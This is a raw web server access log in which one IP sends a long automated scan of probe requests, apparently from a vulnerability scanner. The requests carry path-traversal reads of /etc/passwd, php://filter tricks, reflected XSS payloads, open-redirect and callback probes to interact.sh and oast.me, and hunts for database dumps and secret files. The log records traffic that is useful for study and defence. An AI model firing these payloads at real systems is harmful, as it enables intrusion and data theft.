- - - [20/Oct/2024:20:40:58 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:41:20 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:41:22 +0000] GET /clusters/local HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:20:41:24 +0000] GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
- - - [20/Oct/2024:20:41:46 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:20:41:48 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:41:49 +0000] GET /wp-content/plugins/wpmudev-updates/keys/ HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:20:41:52 +0000] GET /?wptouch_switch=desktop&redirect=https://interact.sh/ HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:41:54 +0000] GET /2niWU4mVOutaDI0FLDHPdG8BAjU HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:41:56 +0000] GET /index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:42:17 +0000] GET /p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cscript%3E HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:42:19 +0000] GET /xwiki/authenticate/wiki/xwiki%22onload=%22alert(document.domain)%22/resetpassword HTTP/1.1 404 1171
195.164.49.69 - - [20/Oct/2024:20:42:21 +0000] GET /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:20:42:23 +0000] GET /index.php?redirect=http%3A%2F%2Fwww.interact.sh HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:42:25 +0000] GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
83.212.98.101 - - [20/Oct/2024:20:42:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:20:42:47 +0000] GET /tests/generate.php HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:20:42:49 +0000] GET /phpmyadmin/ HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:20:42:51 +0000] GET /ioncube/loader-wizard.php HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:20:42:53 +0000] GET /loader-wizard.php HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:20:42:55 +0000] GET /register/?redirect_to=https://interact.sh/ HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:20:42:57 +0000] GET /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:43:18 +0000] GET /message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:20:43:20 +0000] GET /remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:43:22 +0000] GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:43:25 +0000] GET /unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg HTTP/1.1 404 1162
195.164.49.69 - - [20/Oct/2024:20:43:27 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:43:45 +0000] GET /monitoring HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:20:43:47 +0000] GET /..%3B/monitoring HTTP/1.1 404 1094
- - - [20/Oct/2024:20:43:48 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:43:51 +0000] GET /SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp HTTP/1.1 404 1482
195.164.49.69 - - [20/Oct/2024:20:43:53 +0000] GET /secret_token.rb HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:20:43:55 +0000] GET /config/initializers/secret_token.rb HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:20:43:56 +0000] GET /redmine/config/initializers/secret_token.rb HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:20:43:59 +0000] GET /create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1 404 1090
- - - [20/Oct/2024:20:44:01 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:44:03 +0000] GET /atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:20:44:05 +0000] GET /haproxy-status HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:20:44:07 +0000] GET /haproxy?stats HTTP/1.1 404 1081
- - - [20/Oct/2024:20:44:11 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:44:18 +0000] GET /webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:20:44:20 +0000] GET /wp-content/plugins/elementor/readme.txt HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:20:44:22 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:44:24 +0000] GET /index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:44:45 +0000] GET /?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:44:47 +0000] GET /auth/realms/master/clients-registrations/default/security-admin-console HTTP/1.1 404 1165
195.164.49.69 - - [20/Oct/2024:20:44:50 +0000] GET /wp-content/bps-backup/logs/db_backup_log.txt HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:20:44:52 +0000] GET /wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt HTTP/1.1 404 1166
195.164.49.69 - - [20/Oct/2024:20:44:54 +0000] GET /mobileredir/openApp.jsp?redirectUrl=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:44:55 +0000] GET /mobileredir/openApp.jsp?user=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:44:57 +0000] GET /V1.0%3CsVg/onload=alert.bind%28%29%281%29%3E/Alarm/Exceptions/LinkageActions HTTP/1.1 404 1166
195.164.49.69 - - [20/Oct/2024:20:44:59 +0000] GET /yyoa/createMysql.jsp HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:20:45:01 +0000] GET /yyoa/ext/createMysql.jsp HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:20:45:03 +0000] GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:45:25 +0000] GET /contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 400 1169
83.212.98.101 - - [20/Oct/2024:20:45:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:20:45:47 +0000] GET /documentation/playwright.config.js HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:20:45:49 +0000] GET /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:45:51 +0000] GET /login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:45:53 +0000] GET /awstats/awredir.pl?url=interact.sh HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:20:45:55 +0000] GET /cgi-bin/awstats/awredir.pl?url=interact.sh HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:20:45:57 +0000] GET /web/session/logout?redirect=https://oast.me HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:20:45:59 +0000] GET /web/session/logout?redirect=https%3a%2f%2foast.me%2f HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:20:46:01 +0000] GET /web/dbredirect?redirect=https%3a%2f%2foast.me%2f HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:20:46:03 +0000] GET /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1142
195.164.49.69 - - [20/Oct/2024:20:46:25 +0000] GET /calendar/calendar_form.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1 404 1170
195.164.49.69 - - [20/Oct/2024:20:46:27 +0000] GET /plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1 404 1123
195.164.49.69 - - [20/Oct/2024:20:46:49 +0000] GET /cgi-bin/printenv.pl HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:20:46:51 +0000] GET /zabbix/zabbix.php?action=dashboard.list HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:20:46:53 +0000] GET /mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:20:46:55 +0000] GET /nagios/cgi-bin/status.cgi HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:20:46:57 +0000] GET /cgi-bin/nagios4/status.cgi HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:20:46:59 +0000] GET /cgi-bin/nagios3/status.cgi HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:20:47:01 +0000] GET /.git/ HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:47:04 +0000] GET /webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:20:47:25 +0000] GET /plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) HTTP/1.1 404 1112
83.212.98.101 - - [20/Oct/2024:20:47:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:20:47:27 +0000] GET /wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1 HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:47:29 +0000] GET /cgi-bin/printenv HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:20:47:31 +0000] GET /ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/web.config&filename=LEnz6.txt&ContentType=application/octet-stream HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:20:47:33 +0000] GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 404 1136
195.164.49.69 - - [20/Oct/2024:20:47:56 +0000] GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1 404 1135
195.164.49.69 - - [20/Oct/2024:20:48:10 +0000] GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 404 1165
195.164.49.69 - - [20/Oct/2024:20:48:13 +0000] GET /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 404 1142
195.164.49.69 - - [20/Oct/2024:20:48:13 +0000] GET /dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:20:48:13 +0000] GET /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 404 1122
195.164.49.69 - - [20/Oct/2024:20:48:13 +0000] GET /lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:20:48:13 +0000] GET /includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:20:48:13 +0000] GET /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 404 1213
195.164.49.69 - - [20/Oct/2024:20:48:13 +0000] GET /wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 404 1161
195.164.49.69 - - [20/Oct/2024:20:48:14 +0000] GET /wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:20:48:15 +0000] GET /wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 404 1136
195.164.49.69 - - [20/Oct/2024:20:48:15 +0000] GET /wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 404 1148
195.164.49.69 - - [20/Oct/2024:20:48:40 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:48:42 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:48:44 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:48:46 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:48:49 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:49:01 +0000] GET /wp-content/plugins/raygun4wp/readme.txt HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:20:49:05 +0000] POST /admin/index.php?id=pages HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:20:49:06 +0000] POST /fcgi-bin/wgsetcgi HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:20:49:10 +0000] POST /NateMail.php HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:20:49:14 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:49:17 +0000] POST /kindeditor/php/demo.php HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:20:49:18 +0000] POST /php/demo.php HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:49:23 +0000] POST /api/graphql HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:20:49:24 +0000] GET /wp-content/plugins/stop-spammer-registrations-plugin/readme.txt HTTP/1.1 404 1149
195.164.49.69 - - [20/Oct/2024:20:49:26 +0000] GET /backup2.cgi HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:20:49:28 +0000] GET /backup2.cgi HTTP/1.1 404 1085
- - - [20/Oct/2024:20:49:32 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:49:34 +0000] POST /wp-login.php HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:20:49:36 +0000] POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:49:38 +0000] GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:20:49:42 +0000] POST /login.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:50:03 +0000] POST /cgi-bin/login.cgi HTTP/1.1 404 1095
- - - [20/Oct/2024:20:50:06 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:20:50:08 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:50:10 +0000] GET /?q=user/login HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:50:14 +0000] GET /?q=user/login HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:50:20 +0000] GET /index.php?module=users/login HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:50:24 +0000] GET /libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1159
195.164.49.69 - - [20/Oct/2024:20:50:38 +0000] GET /libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1160
195.164.49.69 - - [20/Oct/2024:20:50:38 +0000] GET /libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1154
195.164.49.69 - - [20/Oct/2024:20:50:38 +0000] GET /libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1155
195.164.49.69 - - [20/Oct/2024:20:50:38 +0000] GET /libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1164
195.164.49.69 - - [20/Oct/2024:20:50:38 +0000] GET /libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1166
195.164.49.69 - - [20/Oct/2024:20:50:38 +0000] GET /libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1161
195.164.49.69 - - [20/Oct/2024:20:50:38 +0000] GET /libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1166
195.164.49.69 - - [20/Oct/2024:20:50:39 +0000] GET /libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1160
195.164.49.69 - - [20/Oct/2024:20:50:42 +0000] POST /search-request.php HTTP/1.1 404 1092
83.212.98.101 - - [20/Oct/2024:20:50:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
- - - [20/Oct/2024:20:50:46 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:51:07 +0000] GET / HTTP/1.1 200 11204
- - - [20/Oct/2024:20:51:09 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:51:11 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:51:14 +0000] POST /wp-admin/admin-ajax.php?action=eventon_get_virtual_users HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:51:15 +0000] POST /protocol/index.php HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:20:51:45 +0000] GET /file=http://oast.pro/ HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:20:51:46 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:51:49 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:51:51 +0000] POST /wp-json/wdgpt/v1/purge-error-logs HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:20:51:53 +0000] GET /browse/book/TEST";window.stop();alert(document.domain);%2f%2f HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:20:51:55 +0000] POST /queryDevInfo HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:20:51:57 +0000] GET /file=http%3A%2F%2Foast.pro/ HTTP/1.1 400 1169
83.212.98.101 - - [20/Oct/2024:20:52:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:20:52:39 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=master-realm&redirect_uri=http://localhost:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:40 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=security-admin-console&redirect_uri=http://localhost:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:41 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=broker&redirect_uri=http://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:41 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=broker&redirect_uri=http://localhost:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:41 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=admin-cli&redirect_uri=http://localhost:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:41 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=account&redirect_uri=http://localhost:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:41 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=account-console&redirect_uri=http://localhost:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:41 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=security-admin-console&redirect_uri=http://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:41 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=master-realm&redirect_uri=http://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:43 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=security-admin-console&redirect_uri=https://localhost:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:43 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=admin-cli&redirect_uri=http://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:44 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=account&redirect_uri=http://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:44 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=account-console&redirect_uri=http://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:44 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=broker&redirect_uri=https://localhost:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:44 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=master-realm&redirect_uri=https://localhost:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:45 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=account&redirect_uri=https://localhost:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:45 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=admin-cli&redirect_uri=https://localhost:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:45 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=account-console&redirect_uri=https://localhost:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:46 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=security-admin-console&redirect_uri=https://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:46 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=master-realm&redirect_uri=https://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:46 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=broker&redirect_uri=https://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:46 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=admin-cli&redirect_uri=https://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:46 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=account&redirect_uri=https://127.0.0.1:80@oast.me HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:20:52:47 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=account-console&redirect_uri=https://127.0.0.1:80@oast.me HTTP/1.1 404 1132
- - - [20/Oct/2024:20:52:47 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:20:53:06 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:20:53:06 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:20:53:07 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:20:53:07 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:20:53:07 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:20:53:07 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:20:53:07 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:20:53:07 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:20:53:07 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:20:53:09 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:20:53:09 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:53:11 +0000] POST /index2.html HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:20:53:11 +0000] POST /index2.html HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:20:53:15 +0000] POST /cgi-bin/login.cgi HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:20:53:17 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:53:26 +0000] GET /site.sql HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:20:53:34 +0000] GET /mysql.sql HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:53:39 +0000] GET /1.sql HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:20:53:44 +0000] GET /backup.sql HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:20:53:44 +0000] GET /data.sql HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:20:53:44 +0000] GET /db_backup.sql HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:20:53:45 +0000] GET /dbdump.sql HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:20:53:45 +0000] GET /db.sql HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:20:53:45 +0000] GET /dump.sql HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:20:53:45 +0000] GET /sdc.iopan.pl:443.sql HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:20:53:47 +0000] GET /database.sql HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:20:53:47 +0000] GET /sdc.iopan.pl:443_db.sql HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:20:53:48 +0000] GET /temp.sql HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:20:53:49 +0000] GET /wp-content/mysql.sql HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:20:53:49 +0000] GET /sql.sql HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:20:53:49 +0000] GET /translate.sql HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:20:53:49 +0000] GET /users.sql HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:53:49 +0000] GET /www.sql HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:20:53:50 +0000] GET /wp-content/uploads/dump.sql HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:20:53:50 +0000] GET /localhost.sql HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:20:53:51 +0000] GET /mysqldump.sql HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:20:54:20 +0000] GET /logs/errors HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:20:54:23 +0000] GET /webmail/logs/sendmail HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:20:54:23 +0000] GET /webmail/logs/sendmail.log HTTP/1.1 404 1107
